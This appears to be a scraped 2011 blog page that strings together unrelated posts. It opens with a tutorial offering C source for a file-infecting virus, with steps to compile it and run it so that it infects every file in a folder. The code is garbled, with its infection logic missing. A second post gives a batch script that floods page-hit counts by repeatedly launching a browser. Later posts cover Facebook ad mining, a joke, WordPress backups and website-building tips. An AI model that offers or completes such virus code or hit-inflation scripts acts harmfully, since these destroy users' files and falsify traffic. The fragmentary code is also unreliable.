Monday, July 11, 2011

Create ur own Virus

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
if(host==NULL) goto next;
printf(“Infecting %sn”,ffblk.ff_name,a);
printf(“DONE! (Total Files Infected= %d)”,a);
printf(“TIME TAKEN=%f SECn”,


1. Load the program in the compiler, press Alt-F9 to compile
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect


1. Open new empty folder
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it.

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Facebook Reading Your Words for Real-Time Ads

Facebook just cranked up the creepiness factor for a small percentage of users.
According to Ad Age, the social network is testing real-time data mining of status updates and wall posts. So if you announce to the world that you just had a baby, Facebook might immediately respond with an ad for diapers. For now, instant data mining is limited to 1 percent of Facebook users, which translates to roughly 6 million users.
Data mining isn’t new for Facebook. The site already uses wall posts and status updates to create relevant ads, and in January, Facebook rolled out “Sponsored Stories,” which transplants the things people say about brands to the advertising bar on the side of the screen. The difference here is timing. Instead of saving the data from wall posts and status updates for later, Facebook is analyzing what users write to generate instant ads.
If you use Gmail, this shouldn’t be too disconcerting. For years, Google has used the text of e-mails to spit out relevant advertisements. But if the whole idea gives you the creeps, at least take comfort knowing that this type of data mining is all handled by algorithms, so you needn’t worry about some marketer poring over your every word. If you want to worry about privacy, there are plenty of other good reasons.
Facebook won’t say how the real-time ads are going, but a spokesman told Ad Age that the tests will continue indefinitely

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Automatic Web Page Hiter

This small program can flood ur page hits.
but you have to dedicate one browser for it.. like internet explorer
make a batch file with these lines
@echo off
start C:\Progra~1\Intern~1\iexplore.exe
ping -n 10 >nul
taskkill.exe /im iexplore.exe
goto 1
depending upon your net speed u may increase the 10 secs time wait
with 10 sec time u may have 360 hits in an hour
with 5 sec time u may have 720 hits in an hour

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love story of an Engineering student

A guy was deeply in love with his classmate.
One day he proposed her by saying that he loved her a lot….
But she was angry and refused and threatened him that she’d complain to the Principal if he ever bothers her again.
One day the girl borrowed a text book from that boy and wrote a message “I love you too, I’m sorry to hurt you the other day.
if u’ve forgiven me, please come and talk to me and never leave me.” in that book.
But the guy never talked to her.
4 yrs went away and nothing happened..
Moral of the story . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . .. . . . . . . . . . . . . . . . . . . . . . . Engineering boys never open their books!!!

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Is Your WordPress Blog Safe? Here Is How To Bullet Proof It

Yes, this post is about how to protect your blog from hackers and other evil out there.
It might sound technical and a boring read but, I promise to give you a light read and real advice that you, the non-programmer individual, can actually follow and implement.
Why did I choose this topic you ask, if I think it’s tedious… well, I had SocialMouths hacked a while back and more recently had a couple of friends go through similar experiences. It’s no fun. In my case, my site went completely blank, the database was disconnected and a few other nasty things that made it very hard to fix.
The funny thing is that it wasn’t even my fault, it was that famous Network Solutions hack attack a few months ago. Even tough NetSol got the site back up fairly quickly, the site kept crashing. The worst part was not fixing the issues, they finally did, the worst part was that my site was labeled as vulnerable. The site was now considered target of more attacks and it could cause harm to others as well.
When this happens they put a warning on the site, when somebody follows a link to your site or actually type the URL, they first get a nice and very discrete (I’m being sarcastic by the way… just in case) red screen to advice your visitor they’re entering hell.
I know what you’re thinking, nothing like a full-screen red warning with a button that reads “Get me out of here!” to welcome your visitors and start building some trust in your market. Removing this page took about a week by the way. Good times.
But there are things you can do to avoid having your blog hacked, abducted by aliens or just in case of any other issues. To your surprise, these things are doable by anybody that is familiar with how WordPress and plugins work on the surface. Don’t think I’m about to drop a ton of technical jargon here. Let’s go through this list of things you can do to protect your blog:
Strong Password
A no brainer, right? Well, I’ve seen passwords out there my 8 year-old could crack in a few minutes. I’m talking really strong, even if it’s something you will not be able to remember for a while.
Change your password to something that looks like this: Hy%&?83aNP$#g(
Best way to be safe is by preventing. If something happens to your blog and you don’t have any backups, that could pretty much be the end of it and you’ll end up relying on your hosting service, which is most likely not to be running any backups for you. I had a client that was *lucky* enough to have the hosting company recover his for a fee of $120. I don’t wanna say the name of the company but it starts with a “G” and ends with a “Y”.
First thing you need to know is that there are 2 different types of files you need to back up when we’re talking about WordPress:
Blog Files: These are the files that contain all the WordPress code, plugins, themes, etc.
Database: Is all your content, in other words, posts and pages are stored in a database every time you publish something
Both important as you can see and both very different, in terms of backing them up I mean. Let’s look at how we can conduct easy backups for both types of files:
Blog Files
Doing a backup for your blog files is like moving documents from one directory to another.
There is only one tool you need to do this manually, an FTP Client. I use Transmit from Panic which is about $35 but there are plenty of free ones out there for both Mac and PC. If you have a blog, you should have a FTP Client in place in order to connect to your server.
Then it’s just a matter of grabbing the files you need and copy them into your hard drive, external drive or even better, send a copy to the cloud. One little trick I like to do to store these files outside my computer is to save a copy on a Dropbox account and as you can see in the following image, I grab the files from my server right into the Dropbox folder on my computer. Now I can access those files from my laptop, my desktop, my iPhone or online.
This obviously can be done with any other web service that allows you to store files like Google Docs, which I also use.
If you want to “burn a DVD” you can do that too, just don’t tell anybody… save the embarrassment.
One of the things you need to consider is how much these files change to determine how often you should back them up. Maybe once a week or once a month. Now you’ll see why backing up your database more often will be smart.
Monitoring Your Files
Since you are not backing up these files on a daily basis, it could be a good idea to at least have an eye open in case anything weird happens. Have you seen how banks sometimes give you alerts for any unusual behavior in your account? or directly freeze your account until you call in? That’s what the plugin WordPress File Monitor does.
This plugin performs scheduled scans of all your blog files to see if it detects any changes, if it does it alerts you via email. It’s also very easy to configure, look at the following image:
You can also run a manual scan at any time.
Blog Database
Now the database is more critical for a couple of reasons:
You probably don’t know anything about how to manage or troubleshoot a mySQL database… don’t worry, me neither. And hope I never will.
The content of your blog is most likely to change more frequently than theme files, right? Unless you post new content every 3 months…
Automatic Backups with Plugins
Fortunately in this case you can easily set up a system that runs these backups on a regular basis without you having to do anything. There are a few WordPress Plugins that can perform a remote backup of your entire database.
The one I’ve been using for a while is called Remote Database Backup, it’s very easy to configure and it gives you very few options to worry about. You can manually run a backup at any moment and drop it in your hard drive or you can schedule hourly, daily or weekly backups to be delivered via email as you can see in the following image.
Set it up and forget about it! Even better, if you have an additional email account to manage your subscriptions and other services, have your backups go to that address, you don’t need to be looking at this stuff every day.
Your email looks a little like this:
Automatic Backups to Dropbox
Shiny! This is a fairly new plugin that you can also install via your WordPress admin panel and will run scheduled backups. The difference here is that this puppy sends your backups directly to your Dropbox account. This is my recomendation because you not only can forget about it but your data is now on the cloud in a private account.
In this case you have to connect WordPress with your Dropbox account as part of the configuration, which is only 2 clicks (not that I always count clicks… sometimes I don’t).
Step 1: Install the Plugin WordPress Backup to Dropbox and activate
Step 2: Click “Authorize” to be redirected to your Dropbox account
Step 3: Allow. That’s it
After that is a matter of configuring the location and the frequency to store your backups.
It’s a walk in the park.
But there is one more thing…
VaultPress is a full solution for your website backups and activity monitoring. It is from Automattic, the creator of WordPress and other very popular toys.
Now, if you’re thinking that this doesn’t look like a free service, you are absolutely right. The Basic service starts at $15/month per site while other more robust packages can go all the way to $350/month on large scale installations.
Do you need something like this? It really depends, I always say that just because the Internet is full of free shit it doesn’t mean is the right solution. We entrepreneurs sometimes make the mistake to go with free stuff because of our “guerilla spirit” but, what if I told you that you need to invest $40/month to protect your online business that generates a good chunk of your income? or what if your blog is the hottest piece of marketing your business owns out there?
VaultPress might just be something to consider. Nothing to do here, get it and sleep like a baby every night.
Final Thought
So the point for this post was to provide you with some solutions at different levels, something in plain English that you can do yourself to protect your site. Don’t think it’s not gonna happen to you because your blog is not super popular, it happened to SocialMouths and it happened to a few people I know with smaller sites.
WordPress is the biggest self-publishing platform in the planet. It is also open source software. This is why it’s also very popular with hackers.
Get your protection in place.

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Thursday, February 10, 2011

Build your own website, 10 Tips for Success!

Build your own website, 10 Tips for Success!

If you’re a webmaster or a website owner, this article is for you: These 10 tips can help you to build better and more successful websites. I suggest to hire a web developer if you can’t write the HTML source code. Even if you’re able to create a website on your own, it’s often to separate the technical stuff from the marketing part...

Each website project starts with a plan

Write down your ideas to have a plan and think about which sections in your website project are required. Think about which categories you need for your products or services, you need those very soon for the keyword analysis. If possible sketch a simple diagram, this will help you later to remember how your first website’s structure was planned.

Keyword analysis, do some research which keywords need to be used to find your website

Traffic from Google or other search engines is great for conversions on your website. To get your site in Google’s search results you need to know which keywords are used by your customers. By using the Google Adwords Keyword Tool it’s possible to find the most popular keywords. Access the tool and enter 3-5 important keywords which are related to your product or service. From the generated list of keywords it’s not smart to select those with the highest search volume because it’s very hard to compete with existing and more established websites. Go for the keywords with a “higher” volume and check for each of them the competition in Google Search.

Search for available domain names and select a reliable web hosting provider

A keyword sensitive domain name is a good choice for Google SEO. But first you have to decide if you need a domain for branding or a domain name which is better to find in Google. If you choose a keyword domain, you should choose one where the most relevant keyword is included (select a keyword from the keyword analysis). Choose a .com domain name because they gaining more trust than others. If you create a website for a local audience it might be useful to have a domain name with the country TLD.
If your new website need to grow in traffic over the next few month, your hosting account should be able to grow as well. Check the plan you’ve created, if your website success is based on huge traffic you should look for VPS hosting. Other smaller websites running fine on a professional shared hosting account. Don’t go for the cheapest hosting offer, a cheap solution is might become expensive if the hosting account is getting offline at the moment that website has got the some traffic.

Build a website from the scratch or using a Content Management System?

Sometimes it’s better to build a website using a Content Management System (CMS) and sometimes not. The right choice depends on many influences. If you update or expand the websites content frequently, you should go for a CMS. If you have the skills to build a simple HTML page and is your website more static, a basic website without a back-end is often cheaper, built faster and more flexible. If your website has mostly news to publish, you should go for a WordPress blog. There are thousands of premium WordPress themes and WordPress plugins available which you can use to build your website very fast for a smaller budget.

Website templates, choose a stylish layout

A ready to use website template is a good choice for your CMS based or regular website if your design-budget is limited. Remember the plan you made before while selecting a web template for your site. It’s quite common that people choose a design because it looks so good and later they have problems to use a template for the website. If you like great animations and/or sound a Flash template is something for you, but don’t forget that you need special software and knowledge to edit Adobe Flash files.

Writing unique content for your new website

Use the results from your keyword analysis for the text you need to write for your website. Use a set of 3-5 keywords for each section or page, your need more if your text is longer and use less if your copy is short. It’s important that the most important keyword is used inside the headings and the page title (title element) and don’t forget to use this keyword in the text as well. Sometimes it helps to write down the information first and think afterwards about where to use the keywords. Spend some extra time to create great headers.

Building the Website

If you use a Content Management System the building process is very limited. It depends on the CMS, if you need to install some required extensions like a SEO plugin or module (to optimize your website for search engines). If you build your site from the scratch you need to convert your website template into a website. It’s important to use the different header tags (h1, h2 and h3). Use a great page title and use the “alt” attribute inside your image tags. Skip the Meta keywords because they are ignored by most search engines. A Meta description is important because this description is often used as the “snippet” inside search engines:

Test your site and remove all problems

Your website is built and it’s time to do some tests. Test all functions and check your website in different web browsers. Ask more people, which are not involved in your project, to test the website. Resolve all problems before you publish the website.

Web statistics, yes of course!

Your website is live and you get the first visitors, now it’s important to learn how your visitors behave on your site. With web statistic software like Google Analytics it’s possible to learn: What is the bounce rate, how many pages has been viewed by each visitor, how does a visitor has reached your website and much more. Use Google Analytics from the beginning to learn from your visitors and use this information to optimize your site from time to time. The installation of Google Analytics (GA) is very easy; create a profile in GA just and add the tracking code on each page from your website. Google Analytics is 100% free and easy to use.

Promote your website

There are different ways to get visitors to your (new) website. You can do some paid advertising or maybe you like to promote your website for free. Tell your customers and partners about your new website and write also a press release. There are paid and free “press release submission service” sites available, submit your press release there and maybe some journalist or blogger will mention your website in an article. If you’re a member of a group or community? Send your press release to as many organizations as possible, there is always a chance that your website get mentioned in a newsletter. If you’re a member of a social network like Twitter or Facebook, you can mention your site on your profile page as well. But be careful, it’s possible that your friends or followers doesn’t like this kind of self-promotion.

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